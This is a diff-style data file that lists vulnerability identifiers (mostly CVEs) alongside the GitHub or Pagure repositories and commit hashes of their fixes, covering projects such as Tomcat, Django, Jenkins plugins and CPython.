+CVE-2018-14505;https://github.com/mitmproxy/mitmproxy;None:None;False;7f464b89296881f4d9ec032378c4418e832d17e3; +CVE-2020-17490;https://github.com/saltstack/salt;None:None;False;86e18b91ae006de381f71b972f1daab9239bad3c; +CVE-2018-1002150;https://pagure.io/koji;None:None;False;ab1ade75c155c2325ec92913fc5c510fd61757a1; +CVE-2016-1000111;https://github.com/twisted/twisted;None:None;False;69707bb1aa55b3a6cec5e02df01d34d2a93c2519; +JENKINS-RABBITMQ-PUBLISHER-848;https://github.com/jenkinsci/rabbitmq-publisher-plugin;None:None;False;f0306f229a79541650f759797475ef2574b7c057; +CVE-2017-5650;https://github.com/apache/tomcat;None:None;False;2cb9c724e6a2d15a5bc909c4bf1ab9dfc26fa362,5496e193a89b8b8b3177e516358df2f07ab852b3; +SCAPY-1407;https://github.com/secdev/scapy;None:None;False;905c80d6ed435477224c53de8850f763b04d495d; +CVE-2019-6690;https://github.com/vsajip/python-gnupg;None:None;False;3003b654ca1c29b0510a54b9848571b3ad57df19,39eca266dd837e2ad89c94eb17b7a6f50b25e7cf; +CVE-2018-19787;https://github.com/lxml/lxml;None:None;False;6be1d081b49c97cfd7b3fbd934a193b668629109; +CVE-2019-7164;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; +CVE-2014-8650;https://github.com/requests/requests-kerberos;None:None;False;208bebb7008796a07be0204d9b5beaa55d2373ae; +CVE-2020-26244;https://github.com/OpenIDC/pyoidc;None:None;False;62f8d753fa17c8b1f29f8be639cf0b33afb02498; +INDICO-2019-10-1;https://github.com/indico/indico;None:None;False;27dc846bf1c93b80950941e07ac305e4d94ac81,7152d410b86310261ab290e30e351e036f4ea8a; +CVE-2011-0534;https://github.com/apache/tomcat;None:None;False;51640d60c705e57450a105832d91ff4535a96851; +CVE-2019-10308;https://github.com/jenkinsci/analysis-core-plugin;None:None;False;3d7a0c7907d831c58541508b893dcea2039809c5; +CVE-2020-28191;https://github.com/togglz/togglz;None:None;False;ed66e3f584de954297ebaf98ea4a235286784707; +CVE-2021-20180;https://github.com/ansible/ansible;None:None;False;bfea16c4f741d4cd10c8e17bf7eed14240345cb5; +CVE-2009-3695;https://github.com/django/django;None:None;False;e3e992e18b368fcd56aabafc1b5bf80a6e11b495; +CVE-2017-16228;https://github.com/dulwich/dulwich;None:None;False;7116a0cbbda571f7dac863f4b1c00b6e16d6d8d6; +CVE-2018-16168;https://github.com/JPCERTCC/LogonTracer;None:None;False;2bb79861dbaf7e8a9646fcd70359523fdb464d9c; +CVE-2013-2250;https://github.com/apache/ofbiz-framework;None:None;False;c5634799567123b997b6526210e559839741c801; +CVE-2011-4905;https://github.com/apache/activemq;None:None;False;3a71f8e33d0309cb0ca5b5758a8f251da205e757; +CVE-2012-4406;https://github.com/openstack/swift;None:None;False;e1ff51c04554d51616d2845f92ab726cb0e5831a; +CVE-2017-1000504;https://github.com/jenkinsci/jenkins;None:None;False;9b39411b1ae07ce8bf6c7df457bde1c6dabba9f; +CVE-2020-17527;https://github.com/apache/tomcat;None:None;False;21e3408671aac7e0d7e264e720cac8b1b189eb2,8d2fe6894d6e258a6d615d7f786acca80e6020c,d56293f816d6dc9e2b47107f208fa9e95db58c6; +CVE-2019-19118;https://github.com/django/django;None:None;False;092cd66cf3c3e175acce698d6ca2012068d878f,103ebe2b5ff1b2614b85a52c239f471904d2624,36f580a17f0b3cb087deadf3b65eea024f479c2; +CVE-2019-10398;https://github.com/jenkinsci/beaker-builder-plugin;None:None;False;be0101f3541a5d2c28cf226c8b2e55cd4cfc94da; +CVE-2013-2185;https://github.com/apache/tomcat;None:None;False;2a10b5a90e9fadd53eca5a382c2d5feaeb979a37; +CVE-2019-10331;https://github.com/jenkinsci/electricflow-plugin;None:None;False;0a934493290773a953fa7b29c19b555971b1144b; +DJANGO-REST-001;https://github.com/florimondmanca/djangorestframework-api-key;None:None;False;fc51137e056ff3fa3fee7c30f46429f4ab0007c2; +CVE-2019-20907;https://github.com/python/cpython;None:None;False;c55479556db015f48fc8bbca17f64d3e6559855,f3232294ee695492f43d424cc6969d018d49861,79c6b602efc9a906c8496f3d5f4d54c54b48fa0; +CVE-2011-1475;https://github.com/apache/tomcat;None:None;False;885b996773aaffa67822ebec18d69b86d5c47764,eb446820a5cf8e5a2b9d4840933a4e52bb9dd44a; +CVE-2020-2192;https://github.com/jenkinsci/swarm-plugin;None:None;False;4d18f98b00e4c84b152d52346fb9ef1a227b1cf7; +CVE-2019-10354;https://github.com/jenkinsci/jenkins;None:None;False;279d8109eddb7a494428baf25af9756c2e33576b; +CVE-2018-8039;https://github.com/apache/cxf;None:None;False;8ed6208f987ff72e4c4d2cf8a6b1ec9b27575d4; +CVE-2016-10187;https://github.com/kovidgoyal/calibre;None:None;False;3a89718664cb8cce0449d1758eee585ed0d0433c; +SHIFTBOILER-001;https://github.com/projectshift/shift-boiler;None:None;False;11b998e5f5f1ed4a5692aa36d4400693b6d4c93e; +CVE-2020-11977;https://github.com/apache/syncope;None:None;False;2ef69227e8778361e6a87f048bd435220cda9b7d; +CVE-2019-16792;https://github.com/Pylons/waitress;None:None;False;575994cd42e83fd772a5f7ec98b2c56751bd3f65; +CVE-2011-1183;https://github.com/apache/tomcat;None:None;False;de54cec6dfdf375ac5b0a2c59886fa93aca6cdc7; +CVE-2020-29396;https://github.com/odoo/odoo;None:None;False;2be47637dd5cc48ca561ff85cf2d359dde0829a,451cc81a923ecf87298dba88807bb4d3bccfff5,cd32b0c5e6e9fb1ee67a17266eb388be99786f0; +CVE-2018-1000114;https://github.com/jenkinsci/promoted-builds-plugin;None:None;False;9b99b9427cc4f692644f929e70f3e7b2180b11c5; +CVE-2019-14232;https://github.com/django/django;None:None;False;c3289717c6f21a8cf23daff1c78c0c014b94041; +CVE-2019-16546;https://github.com/jenkinsci/google-compute-engine-plugin;None:None;False;df513d57edb86c6844260a7133a0fb97388f5595; +CVE-2015-7337_JUPYTER;https://github.com/jupyter/notebook;None:None;False;9e63dd89b603dfbe3a7e774d8a962ee0fa30c0b; +CVE-2019-10343;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;73afe3cb10a723cb06e29c2e5499206aadae3a0d; +CVE-2020-27216;https://github.com/eclipse/jetty.project;None:None;False;53e0e0e9b25a6309bf24ee3b10984f4145701ed,9ad6beb80543b392c91653f6bfce233fc75b9d5,ab27ec3989a71b665532251d03bfed577e26946; +CVE-2009-2625;https://github.com/apache/xerces2-j;None:None;False;0bdf77af1d4fd26ec2e630fb6d12e2dfa77bc12b; +CVE-2016-4000;https://github.com/jythontools/jython;None:None;False;4c337213bd2964bb36cef2d31509b49647ca6f2a; +CVE-2019-10347;https://github.com/jenkinsci/mashup-portlets-plugin;None:None;False;05eb9bfd5c758c8c477ce6bd4315fd65d83e9a0a; +CVE-2017-12617;https://github.com/apache/tomcat;None:None;False;74ad0e216c791454a318c1811300469eedc5c6f3,e76505ba9bb59d9a8b5ae7c103867b00005ac676,bbcbb749c75056a2781f37038d63e646fe972104,cf0b37beb0622abdf24acc7110daf883f3fe4f95,24aea94807f940ee44aa550378dc903289039ddd,a9dd96046d7acb0357c6b7b9e6cc70d186fae663,d5b170705d24c386d76038e5989045c89795c28c,46dfedbc0523d7182be97f4244d7b6c942164485; +CVE-2019-16541;https://github.com/jenkinsci/jira-plugin;None:None;False;3214a54b6871d82cb34a26949aad93b0fa78d1a8; +CVE-2019-10440;https://github.com/jenkinsci/neoload-plugin;None:None;False;83c8300c8318502b4f4d4c802dd2a10cadfee4c9; +CVE-2015-2296;https://github.com/requests/requests;None:None;False;3bd8afbff29e50b38f889b2f688785a669b9aafc; +CVE-2017-7675;https://github.com/apache/tomcat;None:None;False;cf181edc9a8c239cde704cffc3c503425bdcae2b,dacb030b85fe0e0b3da87469e23d0f31252fdede; +BUILDBOT-001;https://github.com/buildbot/buildbot;None:None;False;e159e4ed0a2fee9c7e41e81ae81333b0c9557256; +CVE-2019-9636;https://github.com/python/cpython;None:None;False;c0d95113b070799679bcb9dc49d4960d82e8bb0; +CVE-2021-26118;https://github.com/apache/activemq-artemis;None:None;False;e5566d52116d81611d914548adc3cbb14d7118d4; +CVE-2012-2379;https://github.com/apache/cxf;None:None;False;4500bf901cb2a7312291b6663045f28a95d2a0c4; +CVE-2019-16543;https://github.com/jenkinsci/inflectra-spira-integration-plugin;None:None;False;ce56dce0467afac4537a06bac1c562b0350588ec; +CVE-2011-1419;https://github.com/apache/tomcat;None:None;False;02780bbc6089a12b19d3d5e5dc810455ac6bfe92; +PYCRYPTODOME-001;https://github.com/Legrandin/pycryptodome;None:None;False;f80debf2d26cfd7f30dae95f2b2a893d3a34ee8c; +CVE-2014-3503;https://github.com/apache/syncope;None:None;False;8e0045925a387ee211832c7e0709dd418cda1ad3; +CVE-2018-1000531;https://github.com/inversoft/prime-jwt;None:None;False;abb0d479389a2509f939452a6767dc424bb5e6ba; +CVE-2019-10291;https://github.com/jenkinsci/netsparker-cloud-scan-plugin;None:None;False;cce62d7188f12ab9cf1d5272eb859beb710d521a; +CVE-2020-2095;https://github.com/jenkinsci/redgate-sql-ci-plugin;None:None;False;962f1770eeb1f18dfac91d12461fa6db566e769e; +CVE-2020-7655;https://github.com/hivesolutions/netius;None:None;False;9830881ef68328f8ea9c7901db1d11690677e7d1; +CVE-2019-16551;https://github.com/jenkinsci/gerrit-trigger-plugin;None:None;False;bdc94d3e23df0ad6a64565c732498f89ff743b51; +CVE-2017-18638;https://github.com/graphite-project/graphite-web;None:None;False;71726a0e41a5263f49b973a7b856505a5b931c1f; +CVE-2016-10745;https://github.com/pallets/jinja;None:None;False;9b53045c34e61013dc8f09b7e52a555fa16bed16; +CVE-2019-10337;https://github.com/jenkinsci/token-macro-plugin;None:None;False;004319f1b6e2a0f097a096b9df9dc19a5ac0d9b0; +CVE-2019-1003044;https://github.com/jenkinsci/slack-plugin;None:None;False;0268bbefdcc283effd27be5318770f7e75c6f102; +CVE-2016-10149;https://github.com/rohe/pysaml2;None:None;False;6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; +CVE-2006-0847;https://github.com/cherrypy/cherrypy;None:None;False;7e6187ee19a90ebe7f8597296bfa942cd1eb1864; +CVE-2019-1003020;https://github.com/jenkinsci/kanboard-plugin;None:None;False;01b6e508ccfa26b73974c988a5ba4c7aed9126e9; +ASYNC-HTTP-CLIENT-352;https://github.com/AsyncHttpClient/async-http-client;None:None;False;df6ed70e86c8fc340ed75563e016c8baa94d7e72; +CVE-2019-1003022;https://github.com/jenkinsci/monitoring-plugin;None:None;False;ad99b20cecd1a084d93e707bb29fa9557d2f4382; +CVE-2020-13943;https://github.com/apache/tomcat;None:None;False;1bbc650cbc3f08d85a1ec6d803c47ae53a84f3b,5591143,9d7def0; +CVE-2019-10751;https://github.com/jakubroztocil/httpie;None:None;False;df36d6255df5793129b02ac82f1010171bd8a0a8; +CVE-2016-1000110;https://github.com/python/cpython;None:None;False;17742f2d45c9dd7ca777e33601a26e80576fdbf,436fe5a447abb69e5e5a4f453325c422af02dca,4cbb23f8f278fd1f71dcd5968aa0b3f0b4f3bd5,cde03fa0381fcb7f7d3ba0dff4e784eade1f303; +CVE-2017-2654;https://github.com/jenkinsci/email-ext-plugin;None:None;False;af2cc9bf649781c3c84c6891298db0d8601b193d; +CVE-2020-2110;https://github.com/jenkinsci/script-security-plugin;None:None;False;1a09bdcf789b87c4e158aacebd40937c64398de3; +CVE-2020-17532;https://github.com/apache/servicecomb-java-chassis;None:None;False;839a52e27c754cb5ce14f20063902f21065bd26c; +CVE-2019-0205;https://github.com/apache/thrift;None:None;False;798e90aa8715ed0deff68ef4784926fe2be5c0ea; +PLEXUS-ARCHIVER-87;https://github.com/codehaus-plexus/plexus-archiver;None:None;False;f8f4233508193b70df33759ae9dc6154d69c2ea8; +CVE-2017-5591;https://github.com/poezio/slixmpp;None:None;False;22664ee7b86c8e010f312b66d12590fb47160ad8; +CVE-2019-10446;https://github.com/jenkinsci/vmanager-plugin;None:None;False;639aa135ab57d9e23c5bedeb0a5e9518eb0f486e; +CVE-2020-14019;https://github.com/open-iscsi/rtslib-fb;None:None;False;b23d061ee0fa7924d2cdce6194c313b9ee06c468,dffcf83bead64e959505d64ad587768647caab3a; +DJANGO-REST-6330;https://github.com/encode/django-rest-framework;None:None;False;4bb9a3c48427867ef1e46f7dee945a4c25a4f9b8; +CVE-2020-1734;https://github.com/ansible/ansible;None:None;False;a02641c0202a643c9d70475789e3f0d8261ae2ee; +CVE-2020-2090;https://github.com/jenkinsci/ec2-plugin;None:None;False;0cdbaf2d7da5c368209f427559c8608dec22a63b; +CVE-2020-13956;https://github.com/apache/httpcomponents-client;None:None;False;894234a5aeb9958e7e466c383e4d0ded17a9a81,e628b4c5c464c2fa346385596cc78e035a91a62; +CVE-2018-1000056;https://github.com/jenkinsci/junit-plugin;None:None;False;15f39fc49d9f25bca872badb48e708a8bb815ea7; +CVE-2019-12781;https://github.com/django/django;None:None;False;1e40f427bb8d0fb37cc9f830096a97c36c97af6; +CVE-2016-10075;https://github.com/tqdm/tqdm;None:None;False;7996430e92ca0babec510fcf18d62c9f9c4e6b4d; +CVE-2020-1739;https://github.com/ansible/ansible;None:None;False;1a89d4f059c21a818306a39ada7f5284ae12523,6c74a298702c8bb5532b9600073312e08f39680,c6c4fbf4a1fdea1e10ba94462a60c413990a16a; +413684;https://github.com/eclipse/jetty.project;None:None;False;2f08ba29487aff6624dbf947b1fbd845cdd33464; +TENDENCI-919;https://github.com/tendenci/tendenci;None:None;False;3e37622cac81440c5a1f97c39f112a2cf4a5450c; +HADOOP-14246;https://github.com/apache/hadoop;None:None;False;4dd6206547de8f694532579e37ba8103bafaeb1; +CVE-2014-0012;https://github.com/pallets/jinja;None:None;False;acb672b6a179567632e032f547582f30fa2f4aa7; +CVE-2019-6975;https://github.com/django/django;None:None;False;402c0caa851e265410fbcaa55318f22d2bf22ee2; +CVE-2019-1003045;https://github.com/jenkinsci/ecs-publisher-plugin;None:None;False;e901c02a43bfd41ea1736ba1ed24cb614d821569; +CVE-2021-21266;https://github.com/openhab/openhab-addons;None:None;False;81935b0ab126e6d9aebd2f6c3fc67d82bb7e8b86; +CVE-2016-9909;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; +CVE-2017-0910;https://github.com/zulip/zulip;None:None;False;960d736e55cbb9386a68e4ee45f80581fd2a4e32; +CVE-2019-16549;https://github.com/jenkinsci/m2release-plugin;None:None;False;1e4d6fee2eab16e7a396b6d3d5f10a87e5c29cc2; +CVE-2019-14233;https://github.com/django/django;None:None;False;52479acce792ad80bb0f915f20b835f919993c7; +CVE-2017-1000395;https://github.com/jenkinsci/jenkins;None:None;False;7b1f8e96a8d97dd09e5e093fcdb010b3295acc77; +CVE-2015-0778;https://github.com/openSUSE/osc;None:None;False;72e38569aec9519a1c80fb0e129187be45abd754; +CVE-2018-8097;https://github.com/pyeve/eve;None:None;False;29e436117ca52cc494465a833ae10d4587dd2755; +CVE-2017-12791;https://github.com/saltstack/salt;None:None;False;6366e05d0d70bd709cc4233c3faf32a759d0173a; +CVE-2019-10367;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;322ef83f3200ce6076129c014209ef938e556774; +CVE-2020-17519;https://github.com/apache/flink;None:None;False;b561010b0ee741543c3953306037f00d7a9f0801; +CVE-2016-9243;https://github.com/pyca/cryptography;None:None;False;b924696b2e8731f39696584d12cceeb3aeb2d874; +CVE-2020-24584;https://github.com/django/django;None:None;False;2b099caa5923afa8cfb5f1e8c0d56b6e0e81915,a3aebfdc8153dc230686b6d2454ccd32ed4c9e6,cdb367c92a0ba72ddc0cbd13ff42b0e6df70955; +PDFBOX-3341;https://github.com/apache/pdfbox;None:None;False;c90825da4d28d7b1ae9b1484b9a010206be3dec5,a876be72a827cd38901b71d731392e89836261a0,588ece8d40b81e0e64135fc5a973aa99cc5609d9,fec13c320b201cbf420bc8785a4ac02e6b432385; +CVE-2020-26232;https://github.com/jupyter-server/jupyter_server;None:None;False;61ab548bf9186ab7323d8fa7bd0e12ae23555a28; +CVE-2019-1003033;https://github.com/jenkinsci/groovy-plugin;None:None;False;40777c212d45031324685b54816212299fbe434f; +JENKINS-ACUNETIX-951;https://github.com/jenkinsci/acunetix-plugin;None:None;False;b30c0e2c70df1c0c676a90cb02597e72085335f4; +CVE-2019-10315;https://github.com/jenkinsci/github-oauth-plugin;None:None;False;8d51832643e60c6b60b3280febcdb61c23278989; +CVE-2019-10432;https://github.com/jenkinsci/htmlpublisher-plugin;None:None;False;637aad0308f8cdfb24610041fcfe815d5a1a096b; +CVE-2018-1000068;https://github.com/jenkinsci/jenkins;None:None;False;8830d68f5fe21f344be3496984bc4470bfcd0564; +CVE-2018-8010;https://github.com/apache/lucene-solr;None:None;False;6d082d5743dee7e08a86b3f2ef03bc025112512; +CVE-2020-15110;https://github.com/jupyterhub/kubespawner;None:None;False;3dfe870a7f5e98e2e398b01996ca6b8eff4bb1d0; +CVE-2020-15239;https://github.com/horazont/xmpp-http-upload;None:None;False;82056540191e89f0cd697c81f57714c00962ed75; +CVE-2019-16550;https://github.com/jenkinsci/m2release-plugin;None:None;False;1e4d6fee2eab16e7a396b6d3d5f10a87e5c29cc2; +CVE-2018-10903;https://github.com/pyca/cryptography;None:None;False;d4378e42937b56f473ddade2667f919ce32208cb; +CVE-2019-10400;https://github.com/jenkinsci/script-security-plugin;None:None;False;b28e4dc5584ef6515aeb9bc834691176546d0689; +CVE-2019-19010;https://github.com/ProgVal/Limnoria;None:None;False;3848ae78de45b35c029cc333963d436b9d2f0a35; +CVE-2019-10414;https://github.com/jenkinsci/git-changelog-plugin;None:None;False;305e80d8b0eb9728289c9912c595b5d7a00fd749,356243aa6d3f6ad60f057e7567a3466910618441; +CVE-2017-14735;https://github.com/nahsra/antisamy;None:None;False;82da009e733a989a57190cd6aa1b6824724f6d36; +CVE-2019-9710;https://github.com/marshmallow-code/webargs;None:None;False;a4a228bb58031d1cbe0c4a9b180f44f06b202f76; +CVE-2019-10330;https://github.com/jenkinsci/gitea-plugin;None:None;False;7555cb7c168cfa49d31271e7d65d76c1fab311f7; +CVE-2011-1582;https://github.com/apache/tomcat;None:None;False;2cfe4c0975b9abd80f4557025253ec9987011fe8; +CVE-2020-13957;https://github.com/apache/lucene-solr;None:None;False;8f2f80bbb3c35fef036dce3162f4f03bf465e5f2; +CVE-2019-20529;https://github.com/frappe/frappe;None:None;False;17161976c681c2deadb7a1b84c221ac686c59ee,91f332e92f0cd6742e154926f9794159cbc5575; +CVE-2019-12421;https://github.com/alopresto/nifi;None:None;False;cf6f5172503ce438c6c22c334c9367f774db7b24; +CVE-2015-1772;https://github.com/apache/hive;None:None;False;6929846a8120eaf094b914b4ca8af80b65f891c8; +CVE-2019-14234;https://github.com/django/django;None:None;False;4f5b58f5cd3c57fee9972ab074f8dc6895d8f38; +CVE-2018-6596;https://github.com/anymail/django-anymail;None:None;False;c07998304b4a31df4c61deddcb03d3607a04691; +DJANGONEWSLETTER-001;https://github.com/dokterbob/django-newsletter;None:None;False;bea5a5100cc40717995dafc65ff011bc76696ebd; +CVE-2017-5648;https://github.com/apache/tomcat80;None:None;False;6d73b079c55ee25dea1bbd0556bb568a4247dacd,6bb36dfdf6444efda074893dff493b9eb3648808,dfa40863421d7681fed893b4256666491887e38c,0f7b9465d594b9814e1853d1e3a6e3aa51a21610; +CVE-2018-1000406;https://github.com/jenkinsci/jenkins;None:None;False;c3351d2e7c3edfee82b9470e9aa1168982296072; +CVE-2018-19443;https://github.com/tryton/tryton;None:None;False;8f682ef5ef477fe32dad02bcfdbe4beb6e22c96; +CVE-2019-16789;https://github.com/Pylons/waitress;None:None;False;11d9e138125ad46e951027184b13242a3c1de017; +CVE-2020-7698;https://github.com/Gerapy/Gerapy;None:None;False;e8446605eb2424717418eae199ec7aad573da2d2; +PYRAMID-193;https://github.com/Pylons/pyramid;None:None;False;d0f62591ceb2f6ba6efe98ccf75703e7baee687e; +CVE-2014-0035;https://github.com/apache/cxf;None:None;False;5df3f72f1a26b7c9ac2888ab65e41f4105706580; +CVE-2019-10368;https://github.com/jenkinsci/jclouds-plugin;None:None;False;dd975cc394467c1bbd4d91104094b62157bcfdfc; +CVE-2013-7330;https://github.com/jenkinsci/jenkins.git;None:None;False;36342d71e29e0620f803a7470ce96c61761648d8; +CVE-2017-8109;https://github.com/saltstack/salt;None:None;False;6e34c2b5e5e849302af7ccd00509929c3809c658; +CVE-2020-11995;https://github.com/ebourg/hessian;None:None;False;cf851f5131707891e723f7f6a9718c2461aed826; +CVE-2019-3498;https://github.com/django/django;None:None;False;1cd00fcf52d089ef0fe03beabd05d59df8ea052; +CVE-2020-7694;https://github.com/encode/uvicorn;None:None;False;895807f94ea9a8e588605c12076b7d7517cda503; +CVE-2014-8125;https://github.com/droolsjbpm/drools.git;None:None;False;c48464c3b246e6ef0d4cd0dbf67e83ccd532c6d3; +CVE-2019-16557;https://github.com/jenkinsci/redgate-sql-ci-plugin;None:None;False;18525ee6f01a5bc36040d40f1ff63702ce7280ac; +CVE-2016-4468;https://github.com/cloudfoundry/uaa;None:None;False;215bd349a63edfef15a1aa07a3969c8991e34570,6bf1c0ae1abc9aaba957708e0b2dfb6a70aab826,b384a650a122e42d75e8cbb5624d0274a65cd848; +CONFIDENCE-001;https://github.com/HolmesNL/confidence;None:None;False;c94f3510aabf1d8f67e58ae0d3350c98821d296b; +CVE-2017-16764;https://github.com/illagrenan/django-make-app;None:None;False;acd814433d1021aa8783362521b0bd151fdfc9d2; +CVE-2014-1859;https://github.com/numpy/numpy;None:None;False;961c43da78bf97ce63183b27c338db7ea77bed8; +CVE-2016-9013;https://github.com/django/django;None:None;False;34e10720d81b8d407aa14d763b6a7fe8f13b4f2; +DJANGO-REGISTRATION-001;https://github.com/macropin/django-registration;None:None;False;3a2e0182ff92cc8ce39a932e463cbac37e485afa; +CVE-2020-11652;https://github.com/saltstack/salt;None:None;False;cce7abad9c22d9d50ccee2813acabff8deca35d,d5801df94b05158dc8e48c5e6912b065044720f; +CVE-2020-2231;https://github.com/jenkinsci/jenkins;None:None;False;29c9a8fdeafe26fded955cfba188f50fd4f1786a; +CVE-2019-7722;https://github.com/pmd/pmd;None:None;False;e295711343cc155cb64ea0ae29ce9d69201469b3; +CVE-2019-19911;https://github.com/python-pillow/Pillow;None:None;False;138bd714f5cb2346af71447f7ec52ed54037bc0b; +CVE-2018-8768;https://github.com/jupyter/notebook;None:None;False;e321c80776542b8d6f3411af16f9e21e51e27687; +CVE-2019-10301;https://github.com/jenkinsci/gitlab-plugin;None:None;False;f028c65539a8892f2d1f738cacc1ea5830adf5d3; +APACHE-JSPWIKI-1109;https://github.com/apache/jspwiki;None:None;False;46cd981dfb431730da3f9249f5db858aacf11e52; +CVE-2021-21236;https://github.com/Kozea/CairoSVG;None:None;False;cfc9175e590531d90384aa88845052de53d94bf3; +CVE-2013-1768;https://github.com/apache/openjpa;None:None;False;b8933dc24b84e7e7430ece56bd645d425dd89f24,f4ca597b9a7000a88ad6bbe556283247e9f6bc14,521fecd2d9b91c27e9f90d97e5f5479d17239eb8,01bc0d257b38743372af91cb88269524634db7d3,7f14c7df6b7c7ef42f0671138b9b5dd062fe99aa,ad5cd6fb86af8809b367f709b6e041218055de2f,d3c68ad3bb9aa0e4e9abbfdec691abb06df642a5,4487017fbf57fb7aed4024e0991850bb89fc1c43,87a4452be08b4f97274d0ccfac585ae85841e470; +CVE-2011-4461-JETTY;https://github.com/eclipse/jetty.project;None:None;False;979d6dbbf9416b1a0ad965e2b8a3b11a2d208627,d0b81a185c260ffceecb9d7470b3ddfbfeda4c11; +CVE-2019-10346;https://github.com/jenkinsci/embeddable-build-status-plugin;None:None;False;38e057b71bcd0d494b04215420919abfda93e324; +CVE-2016-8647;https://github.com/ansible/ansible-modules-core;None:None;False;1a6a9ced61bf4ad2519351be53b15126f86f582; +CVE-2014-0095;https://github.com/apache/tomcat;None:None;False;1bd7d414983f2f420dd37e78b5f4686e737dd3e6; +CVE-2019-10411;https://github.com/jenkinsci/inedo-buildmaster-plugin;None:None;False;cef77a827e92718fc89728397e428872fd2518b1; +CVE-2018-16406;https://github.com/mayan-edms/mayan-edms;None:None;False;48dfc06e49c7f773749e063f8cc69c95509d1c32; +CVE-2020-26275;https://github.com/jupyter-server/jupyter_server;None:None;False;85e4abccf6ea9321d29153f73b0bd72ccb3a6bca; +CVE-2016-7401;https://github.com/django/django;None:None;False;6118ab7d0676f0d622278e5be215f14fb5410b6; +CVE-2015-1832;https://github.com/apache/derby;None:None;False;0a1be27fce4f2be06daeed20f2cb8dd8f1932ae9,7643f9651406e12c9563a92b3dd258505e6c7144,a72ebf9def427bd0e3838eb0e3fa9c3266e88297; +CVE-2017-12616;https://github.com/apache/tomcat;None:None;False;07dc0ea2745f0afab6415f22b16a29f1c6de5727; +CVE-2019-1003017;https://github.com/jenkinsci/job-import-plugin;None:None;False;8f826a684ba0969697d2a92a6f448aef8f03b66c; +CVE-2020-27783;https://github.com/lxml/lxml;None:None;False;89e7aad6e7ff9ecd88678ff25f885988b184b26,a105ab8dc262ec6735977c25c13f0bdfcdec72a; +APACHE-COMMONS-001;https://github.com/apache/commons-compress;None:None;False;a080293da69f3fe3d11d5214432e1469ee195870,e9f2dadb916063c1e97ab2bbf41bee059e277c19; +SCRAPY-676;https://github.com/scrapy/scrapy;None:None;False;43217fd698135b4795d191f8a935f3ba0b869c54,554102fd70b14ee83109003cf77ab3a4f91f4f58,c2a424daaeca851c9d4a6b930eabf2a0422fdfe3; +CVE-2019-1003010;https://github.com/jenkinsci/git-plugin;None:None;False;f9152d943936b1c6b493dfe750d27f0caa7c0767; +CVE-2017-4992;https://github.com/cloudfoundry/uaa;None:None;False;1c9c6dd88266cfa7d333e5d8be1031fa31c5c93; +CVE-2018-17420;https://github.com/94fzb/zrlog;None:None;False;157b8fbbb64eb22ddb52e7c5754e88180b7c3d4f; +CVE-2014-9527;https://github.com/apache/poi;None:None;False;39dbbe9c413f9d04d6b51a20e93f2a2ff270f314; +CVE-2019-1003005;https://github.com/jenkinsci/script-security-plugin;None:None;False;35119273101af26792457ec177f34f6f4fa49d99; +CVE-2019-1003092;https://github.com/jenkinsci/nomad-plugin;None:None;False;3331d24896b815c375e528207c5572e18631c49d; +CVE-2017-18361;https://github.com/Pylons/colander;None:None;False;d4f4f77a2cfa518426178bd69d2b29dee57f770d,1a17b237fed2fdd3ac0e04ec8bfb4b206c7fe046; +CVE-2014-2058;https://github.com/jenkinsci/jenkins.git;None:None;False;b6b2a367a7976be80a799c6a49fa6c58d778b50e; +CVE-2019-16555;https://github.com/jenkinsci/build-failure-analyzer-plugin;None:None;False;f316c885552ac75289cbb11b2af5757f18784bcb; +CVE-2016-10516;https://github.com/pallets/werkzeug;None:None;False;1034edc7f901dd645ec6e462754111b39002bd65; +CVE-2018-8718;https://github.com/jenkinsci/mailer-plugin;None:None;False;98e79cf904769907f83894e29f50ed6b3e7eb135; +CVE-2019-11340;https://github.com/matrix-org/sydent;None:None;False;4e1cfff53429c49c87d5c457a18ed435520044fc; +CVE-2019-1003008;https://github.com/jenkinsci/warnings-ng-plugin;None:None;False;c3ca6a0b66b3e2958257c13c0c8e1833431fe73d; +CVE-2018-1002200;https://github.com/codehaus-plexus/plexus-archiver;None:None;False;58bc24e465c0842981692adbf6d75680298989de; +CVE-2019-1003039;https://github.com/jenkinsci/appdynamics-plugin;None:None;False;c5efd9d97babf05db31bfdbefc49c3c49b3c781f; +CVE-2020-13944;https://github.com/apache/airflow;None:None;False;5c2bb7b0b0e717b11f093910b443243330ad93ca; +CVE-2020-15251;https://github.com/MirahezeBots/sopel-channelmgnt;None:None;False;fd5da591fed6395702cfc9b74bc95c4dd6997e78,221ddd4852f0acbb9c98824332f7a499d2a3a362,4b7dff2bcf68bb614f9449f6d151f06af5aa1d76,6554cc81101d6892f7dc70012b784ddc7491bb8e; +CVE-2019-2435;https://github.com/mysql/mysql-connector-python;None:None;False;069bc6737dd13b7f3a41d7fc23b789b659d8e20; +CVE-2012-2378;https://github.com/apache/cxf;None:None;False;9bb4612d3352ef3e3292fdce25e3c70b43d63c6f; +CVE-2018-1000863;https://github.com/jenkinsci/jenkins;None:None;False;4ed66e5838476e575a83c3cd13fffb37eefa2f48; +CVE-2020-2191;https://github.com/jenkinsci/swarm-plugin;None:None;False;4d18f98b00e4c84b152d52346fb9ef1a227b1cf7; +SONARQUBE-001;https://github.com/SonarSource/sonarqube;None:None;False;08438a2c47112f2fce1e512f6c843c908abed4c7; +CVE-2018-16167;https://github.com/JPCERTCC/LogonTracer;None:None;False;2bb79861dbaf7e8a9646fcd70359523fdb464d9c; +CVE-2019-10904;https://github.com/roundup-tracker/roundup;None:None;False;a2edc3cba0b5d34005114f6da0251bd9ac2837df; +CVE-2017-8032;https://github.com/cloudfoundry/uaa;None:None;False;4e4d653edb6b8f68e12b7c415e07e068b1574b8; +CVE-2019-1003084;https://github.com/jenkinsci/zephyr-enterprise-test-management-plugin;None:None;False;a2a698660c12d78e06f78c813c3ff10b4c30db16; +CVE-2016-6812;https://github.com/apache/cxf;None:None;False;45b1b5b94aaebca6900cfff6c62a5d038e9ad28b,a23c615b68830edb56855f8edb015fae32616516; +CVE-2016-9014;https://github.com/django/django;None:None;False;45acd6d836895a4c36575f48b3fb36a3dae98d1; +CVE-2018-20244;https://github.com/apache/airflow;None:None;False;27a4a888e946728d9bb33b78ec604e08d4a93f89; 